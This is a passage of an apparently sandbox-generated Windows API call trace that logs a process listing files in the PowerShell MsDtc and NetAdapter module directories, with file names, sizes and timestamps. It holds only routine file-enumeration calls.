lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x60f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.011] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe44, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcLogTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.011] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x154d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcNetworkSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.011] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.011] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsStatisticsTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.012] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa84, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSessionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.012] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaa4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.012] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1766, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.012] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6701, dwReserved0=0x0, dwReserved1=0x0, cFileName="TestDtc.psm1", cAlternateFileName="")) returned 1 [0265.013] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6701, dwReserved0=0x0, dwReserved1=0x0, cFileName="TestDtc.psm1", cAlternateFileName="")) returned 0 [0265.013] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0265.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0265.014] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc\\msdtc.psd1")) returned 0x20 [0265.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.014] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d [0265.014] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", lpFilePart=0x0) returned 0x3e [0265.014] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8db080 [0265.014] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.015] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ffb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.015] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapter.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.015] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3925, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterAdvancedProperty.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.015] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e57, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterAdvancedProperty.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.015] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x260e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterBinding.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.015] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterBinding.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.016] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2fb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterChecksumOffload.cdxml", cAlternateFileName="")) returned 1 [0265.016] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterChecksumOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.016] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2418, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterEncapsulatedPacketTaskOffload.cdxml", cAlternateFileName="")) returned 1 [0265.016] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterEncapsulatedPacketTaskOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.016] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterHardwareInfo.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.016] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterHardwareInfo.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.017] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x245a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterIPsecOffload.cdxml", cAlternateFileName="")) returned 1 [0265.017] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x15fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterIPsecOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.017] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2432, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterLso.cdxml", cAlternateFileName="")) returned 1 [0265.017] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1748, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterLso.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.017] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e61, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPacketDirect.cdxml", cAlternateFileName="")) returned 1 [0265.017] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c25, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPacketDirect.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.018] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4100, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.018] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcea, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0265.018] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e50, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.018] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2005, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.cdxml", cAlternateFileName="")) returned 1 [0265.018] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x148f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0265.019] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.019] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRdma.cdxml", cAlternateFileName="")) returned 1 [0265.019] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a18, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRdma.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.019] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c691a7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c691a7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a70, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRsc.cdxml", cAlternateFileName="")) returned 1 [0265.019] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRsc.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.019] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x27d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRss.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.020] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1808, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRss.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.020] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, 